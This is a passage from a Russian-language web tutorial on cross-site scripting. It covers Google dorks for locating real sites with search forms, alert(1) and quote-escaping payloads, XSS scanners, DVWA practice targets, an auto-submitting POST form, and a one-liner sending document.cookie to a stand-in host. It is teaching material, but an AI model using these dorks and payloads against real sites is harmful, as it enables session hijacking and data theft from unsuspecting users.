<li>inurl:.php?q=</li> <li>inurl:search.php</li> <li>inurl:.php?search=</li> </ul><p>Перед нами откроется список сайтов. Нужно открыть сайт и найти на нём поля ввода, такие как форма обратной связи, форма ввода, поиск по сайту и т.д.</p> <p>Сразу замечу, что практически бесполезно искать уязвимости в популярных автоматически обновляемых веб-приложениях. Классический пример такого приложения – WordPress. На самом деле, уязвимости в WordPress, а в особенности в его плагинах, имеются. Более того, есть множество сайтов, которые не обновляют ни движок WordPress (из-за того, что веб-мастер внёс в исходный код какие-то свои изменения), ни плагины и темы (как правило, это пиратские плагины и темы). Но если вы читаете этот раздел и узнаёте из него что-то новое, значит WordPress пока не для вас… К нему обязательно вернёмся позже.</p> <p>Самые лучшие цели – это разнообразные самописные движки и скрипты.</p> <p>В качестве полезной нагрузки для вставки можно выбрать</p><p> <script>alert(1)</script> </p><p>Обращайте внимание, в какие именно тэги HTML кода попадает ваш внедрённый код. Вот пример типичного поля ввода</p><p> < input type = "text" class = "ui-input query" name = "q" value = "наволочка" />< script >alert(1)</ script >< input value = "" /> </p><p>Наша полезная нагрузка попадёт туда, где сейчас слово «наволочка». Т.е. превратиться в значение тэга <b>input </b>. Мы можем этого избежать – закроем двойную кавычку, а затем и сам тэг с помощью <b>«/> </b></p> <p> "/><script>alert(1)</script> </p><h2><span>Программы для поиска и сканирования XSS уязвимости </span></h2> <p>Наверное, все сканеры веб-приложений имеют встроенный сканер XSS уязвимостей. Эта тема неохватная, лучше знакомиться с каждым подобным сканером отдельно.</p> <p>Имеются также специализированные инструменты для сканирования на XSS уязвимости. Среди них особенно можно выделить:</p> <ul><li>XSSer – это не только мощный сканер, который умеет использовать разные методы внедрения и обхода фильтрации, это также автоматизированный инструмент по поиску уязвимых к XSS сайтов (по доркам). Для сайтов с найденными уязвимостями умеет внедрять полезную нагрузку для реальной атаки;</li> <li>XssPy – тоже достаточно самостоятельный инструмент, который умеет находить все страницы сайта (в том числе и на субдоменах) и проверять все элементы ввода на этих страницах;</li> <li>BruteXSS – положительной особенностью этого инструмента является полное исключение ложных срабатываний.</li> </ul><h2><span>Уязвимые веб-приложения для тестирования XSS </span></h2> <p>Большинство наборов уязвимых веб-приложений (кроме некоторых узкоспециальных) имеют в своём составе сайты, уязвимые к XSS. Самым лучшим вариантом является их использование в автономной среде обучения Dojo , который собрал множество приложений для тестирования. Например, свои навыки по выявлению и эксплуатации XSS можно тренировать на:</p> <p><b>Damn Vulnerable Web App (DVWA): </b></p> <ul><li>http://localhost/dvwa/vulnerabilities/xss_r/ (непостоянная XSS)</li> <li>http://localhost/dvwa/vulnerabilities/xss_s/ (хранимая XSS)</li> </ul><p><img src='https://i1.wp.com/helpugroup.com/wp-content/uploads/2017/06/201.jpg' width="100%" loading=lazy></p> <p><b>Mutillidae/NOWASP (очень много самых разнообразных вариаций XSS) </b></p> <ul><li>http://localhost/mutillidae/</li> </ul><p><img src='https://i2.wp.com/helpugroup.com/wp-content/uploads/2017/06/202.jpg' width="100%" loading=lazy></p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости.</p> <p>Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия. Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2>XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><img src='https://i1.wp.com/info-business.pro/wp-content/uploads/2017/01/screen-shot.png' align="center" width="100%" loading=lazy></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья».</p> <p>Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.<br><br><img src='https://i0.wp.com/info-business.pro/wp-content/uploads/2017/01/xss-example-flow-diagram1.png' align="center" width="100%" loading=lazy></p> <h2>Традиционные XSS-атаки:</h2> <h4>Отраженные (непостоянные).</h4> <p>Отраженная XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.</p> <p>Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента, без надлежащей обработки.</p> <h4>Хранимые (постоянные).</h4> <p>Хранимые XSS возможны, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате.</p> <h2>Уязвимости, вызванные кодом на стороне клиента (JavaScript, Visual Basic, Flash и т. д.):</h2> <h3>Также известные как DOM-модели:</h3> <h4>Отраженные (непостоянные).</h4> <p>То же самое, что и в случае с серверной стороной, только в этом случае атака возможна благодаря тому, что код обрабатывается браузером.</p> <h4>Хранимые (постоянные).</h4> <p>Аналогичны хранимым XSS на стороне сервера, только в этом случае вредоносная составляющая сохраняется на клиентской стороне, используя хранилище браузера.</p> <h2>Примеры XSS уязвимостей.</h2> <p>Интересно, что в большинстве случаев, где описывается данная уязвимость, нас пугают следующим кодом:</p><p>Http://www.site.com/page.php?var=<script>alert("xss");</script> </p><p>Существует два типа XSS уязвимостей - пассивная и активная.</p> <p><i>Активная уязвимость </i> более опасна, поскольку злоумышленнику нет необходимости заманивать жертву по специальной ссылке, ему достаточно внедрить код в базу или какой-нибудь файл на сервере. Таким образом, все посетители сайта автоматически становятся жертвами. Он может быть интегрирован, например, с помощью внедрения SQL-кода (SQL Injection). Поэтому, не стоит доверять данным, хранящимся в БД, даже если при вставке они были обработаны.</p> <p>Пример <i>пассивной уязвимости </i> можно посмотреть в самом начале статьи. Тут уже нужна социальная инженерия, например, важное письмо от администрации сайта с просьбой проверить настройки своего аккаунта, после восстановления с бэкапа. Соответственно, нужно знать адрес жертвы или просто устроить спам-рассылку или разместить пост на каком-нибудь форуме, да еще и не факт что жертвы окажутся наивными и перейдут по вашей ссылке.</p> <p>Причем пассивной уязвимости могут быть подвержены как POST так и GET-параметры. С POST-параметрами, понятно, придется идти на ухищрения. Например, переадресация с сайта злоумышленника.</p><p> <form method="post" action="http://site.com/page.php"> </p><p><input type="hidden" name="var" value="<script>alert("xss")</script>"></p> <p><script type="text/javascript"> document.getElementsByTagName("form").submit(); </script></p> <p>Следовательно, GET-уязвимость чуть более опасна, т.к. жертве легче заметить неправильный домен, чем дополнительный параметр (хотя url можно вообще закодировать).</p> <h3>Кража Cookies</h3> <p>Это наиболее часто приводимый пример XSS-атаки. В Cookies сайты иногда хранят какую-нибудь ценную информацию (иногда даже логин и пароль (или его хэш) пользователя), но самой опасной является кража активной сессии, поэтому не забываем нажимать ссылку «Выход» на сайтах, даже если это домашний компьютер. К счастью, на большинстве ресурсов время жизни сессии ограничено.</p><p>Var іmg = new Image(); іmg.srс = "http://site/xss.php?" + document.cookie; </p><p>Поэтому и ввели доменные ограничения на XMLHttpRequest, но злоумышленнику это не страшно, поскольку есть <iframe>, <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy>");</script> <div class="wp_rp_wrap wp_rp_vertical_m" id="wp_rp_first"> <br><div class="wp_rp_content"> <h3 class="related_post_title">Рекомендуем также</h3> <ul class="related_post wp_rp"> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/holidays/vidy-smailikov-i-ih-znachenie-smaily-iz-simvolov-znachenie-smailika.html" class="wp_rp_thumbnail"><img src="/uploads/a5b3529721ca73449bc12df0286f63ed.jpg" alt="Виды смайликов и их значение" width="150" height="150" / loading=lazy></a> <a href="/holidays/vidy-smailikov-i-ih-znachenie-smaily-iz-simvolov-znachenie-smailika.html" class="wp_rp_title">Виды смайликов и их значение</a> </li> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/hi-tech/kak-polzovatsya-programmoi-wincsp-nastroika-podklyucheniya-v-putty-i-winscp-winscp.html" class="wp_rp_thumbnail"><img src="/uploads/74ca038bd94728c7d9b9aeb2b0f908f1.jpg" alt="Настройка подключения в Putty и WinSCP Winscp перенос настроек" width="150" height="150" / loading=lazy></a> <a href="/hi-tech/kak-polzovatsya-programmoi-wincsp-nastroika-podklyucheniya-v-putty-i-winscp-winscp.html" class="wp_rp_title">Настройка подключения в Putty и WinSCP Winscp перенос настроек</a> </li> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/fashion-and-style/be-on-road-besplatnyi-offlain-gps-navigator-be-on-road-besplatnyi-offlain-gps.html" class="wp_rp_thumbnail"><img src="/uploads/0dfb61ea33e315660e7dff685f94f242.jpg" alt="Be-on-Road – бесплатный оффлайн GPS навигатор Карты для be on road 3" width="150" height="150" / loading=lazy></a> <a href="/fashion-and-style/be-on-road-besplatnyi-offlain-gps-navigator-be-on-road-besplatnyi-offlain-gps.html" class="wp_rp_title">Be-on-Road – бесплатный оффлайн GPS навигатор Карты для be on road 3</a> </li> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/food/kak-pomenyat-imya-v-vk-bez-proverki-kak-samomu-izmenit-imya-v-vk.html" class="wp_rp_thumbnail"><img src="/uploads/f8b2eb2081f7bd3dcda9548f7164f2f5.jpg" alt="Как самому изменить имя в ВК: подробная инструкция для смены" width="150" height="150" / loading=lazy></a> <a href="/food/kak-pomenyat-imya-v-vk-bez-proverki-kak-samomu-izmenit-imya-v-vk.html" class="wp_rp_title">Как самому изменить имя в ВК: подробная инструкция для смены</a> </li> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/drinks/chto-delat-esli-voznikaet-oshibka-steam-client-not-found-steam-client-not-found-chto-delat-i-kak.html" class="wp_rp_thumbnail"><img src="/uploads/82b33b1d0d757255cdc4b659e6727927.jpg" alt="Steam client not found — что делать и как исправить сбой Что за ошибка steam client not found" width="150" height="150" / loading=lazy></a> <a href="/drinks/chto-delat-esli-voznikaet-oshibka-steam-client-not-found-steam-client-not-found-chto-delat-i-kak.html" class="wp_rp_title">Steam client not found — что делать и как исправить сбой Что за ошибка steam client not found</a> </li> <li data-position="0" data-poid="in-176" data-post-type="none"><a href="/holidays/acrobat-reader-redaktirovanie-pdf-redaktory-pdf-failov-sohranyaem-iz-photoshop-v.html" class="wp_rp_thumbnail"><img src="/uploads/cce740e4117bc0763f6ba89eff346891.jpg" alt="Acrobat reader редактирование pdf" width="150" height="150" / loading=lazy></a> <a href="/holidays/acrobat-reader-redaktirovanie-pdf-redaktory-pdf-failov-sohranyaem-iz-photoshop-v.html" class="wp_rp_title">Acrobat reader редактирование pdf</a> </li> </ul> </div> </div> </div> </div> </article> <aside id="colRight" class="colRight"> <form method="get" action="/" target="_blank"> <input name="s" id="form-query" value="" placeholder="Поиск по сайту"> <input id="form-querysub" type=submit value=""> </form> <div class="rightBoxtumb"> <h2>Это интересно</h2><div class="rightBoxtumbline"><script type="text/javascript"> <!-- var _acic={dataProvider:10,allowCookieMatch:false};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script></div><h2>Свежие записи</h2> <div class="rightBoxtumbline"></div> <ul> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/ff794c4b9aa40cda951abd6f52b1731f.jpg" class="attachment-loopThumb wp-post-image" alt="Полезные утилиты для диагностики и тестирования железа" / loading=lazy><a href="/real-estate/programmnoe-obespechenie-diagnostiki-neispravnostei-apparatnogo.html" rel="bookmark" title="Полезные утилиты для диагностики и тестирования железа">Полезные утилиты для диагностики и тестирования железа</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/9c80feba0527943cf451e9959f2b2bba.jpg" class="attachment-loopThumb wp-post-image" alt="Диагностика работы драйверов Как найти конфликтующие драйвера windows 7" / loading=lazy><a href="/animals/ispolzovanie-driver-verifier-dlya-vyyavleniya-problemnogo-draivera.html" rel="bookmark" title="Диагностика работы драйверов Как найти конфликтующие драйвера windows 7">Диагностика работы драйверов Как найти конфликтующие драйвера windows 7</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/df21e6c9104c3b806af4a5fcf3dec71b.jpg" class="attachment-loopThumb wp-post-image" alt="Диспетчер проверки драйверов" / loading=lazy><a href="/real-estate/kak-naiti-neispravnyi-draiver-na-kompyutere-dispetcher.html" rel="bookmark" title="Диспетчер проверки драйверов">Диспетчер проверки драйверов</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/03ecda773b6a35dad40abf5b6c263370.jpg" class="attachment-loopThumb wp-post-image" alt="Бесплатные программы для рисования на компьютере и планшете" / loading=lazy><a href="/travel-and-tourism/prilozhenie-chtoby-risovat-besplatnye-programmy-dlya-risovaniya-na-kompyutere-i.html" rel="bookmark" title="Бесплатные программы для рисования на компьютере и планшете">Бесплатные программы для рисования на компьютере и планшете</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/b63f3e481642400f0e6af396133cc1d0.jpg" class="attachment-loopThumb wp-post-image" alt="Перевод денег с телефона на карту сбербанка" / loading=lazy><a href="/culture-and-society/otpravit-dengi-s-telefona-na-drugoi-telefon-perevod-deneg-s-telefona.html" rel="bookmark" title="Перевод денег с телефона на карту сбербанка">Перевод денег с телефона на карту сбербанка</a><br/> </li> </ul> </div> <div class="rightBoxtumb"> <h2>Популярные записи</h2> <div class="rightBoxtumbline"></div> <ul> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/12d7776077f3192ba2dd4db4907de074.jpg" class="attachment-loopThumb wp-post-image" alt="Как открыть и настроить инженерное меню на Андроид — инструкции и секретные коды Отключи автоматическое создание иконок на рабочем столе" / loading=lazy><a href="/culture-and-society/inzhenernoe-menyu-android-kak-poluchit-supersposobnosti-v-mire-smartfonov-kak.html" rel="bookmark" title="Как открыть и настроить инженерное меню на Андроид — инструкции и секретные коды Отключи автоматическое создание иконок на рабочем столе">Как открыть и настроить инженерное меню на Андроид — инструкции и секретные коды Отключи автоматическое создание иконок на рабочем столе</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/aea64596ebb22597900e40ab8851ec94.jpg" class="attachment-loopThumb wp-post-image" alt="Вход в инженерное меню андроид Видео: как открыть инженерное меню на Android" / loading=lazy><a href="/drinks/kak-voiti-i-nastroit-inzhenernoe-menyu-na-android-vhod-v-inzhenernoe.html" rel="bookmark" title="Вход в инженерное меню андроид Видео: как открыть инженерное меню на Android">Вход в инженерное меню андроид Видео: как открыть инженерное меню на Android</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/cad4bb0aaf72071258f83446956a473d.jpg" class="attachment-loopThumb wp-post-image" alt="Как изменить мелодию звонка в Windows Phone?" / loading=lazy><a href="/science/kak-smenit-melodiyu-zvonka-na-windows-phone-kak-izmenit-melodiyu-zvonka-v.html" rel="bookmark" title="Как изменить мелодию звонка в Windows Phone?">Как изменить мелодию звонка в Windows Phone?</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/ad6b10f16b5a185c8637294149faba8d.jpg" class="attachment-loopThumb wp-post-image" alt="Черный список в Nokia как добавить контакт" / loading=lazy><a href="/fashion-and-style/kak-na-nokia-dobavit-nomer-v-chernyi-spisok-telefona-chernyi-spisok.html" rel="bookmark" title="Черный список в Nokia как добавить контакт">Черный список в Nokia как добавить контакт</a><br/> </li> <li> <div class="rightBoxshadowleft"></div> <div class="rightBoxshadowright"></div> <img width="140" height="80" src="/uploads/15e290b9e03860a2a239e1ffecab8f44.jpg" class="attachment-loopThumb wp-post-image" alt="Можно ли и как вернуть деньги за купленный телефон?" / loading=lazy><a href="/math/mozhno-li-vernut-tolko-chto-kuplennyi-telefon-mozhno-li-i-kak.html" rel="bookmark" title="Можно ли и как вернуть деньги за купленный телефон?">Можно ли и как вернуть деньги за купленный телефон?</a><br/> </li> </ul> </div> <div class="rightBox" id="recent-comments-2"> <div class="rightBoxMid"> </div> </div> </aside> </div> </div> </section> <footer id="footer"> <div id="footerInner"> <div class="strup" ></div> <a class='arowup' href='#'></a> </div> <div id="footerdown"> <div id="footerdownInner"> <div id="copyright"> <p><a href="/">russiachess.ru</a> © 2023 Все права защищены <script type="text/javascript" src="https://russiachess.ru/wp-content/themes/Adapter/js/global_footer_main.js"></script> </p> </div> <link rel='stylesheet' id='style-name-css' href='/wp-content/plugins/lightbox/css/frontend/colorbox-1.css?ver=4.3.14' type='text/css' media='all' /> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.3'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/table-of-contents-plus/front.js?ver=1505'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.81'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/dynamic-to-top/js/libs/jquery.easing.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var mv_dynamic_to_top = { "text":"To Top","version":"0","min":"300","speed":"200","easing":"easeInExpo","margin":"20"} ; /* ]]> */ </script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/dynamic-to-top/js/dynamic.to.top.min.js?ver=3.4.2'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/lightbox/js/frontend/custom.js?ver=4.3.14'></script> <script type='text/javascript' src='https://russiachess.ru/wp-content/plugins/lightbox/js/frontend/jquery.colorbox.js?ver=4.3.14'></script> </body> </html>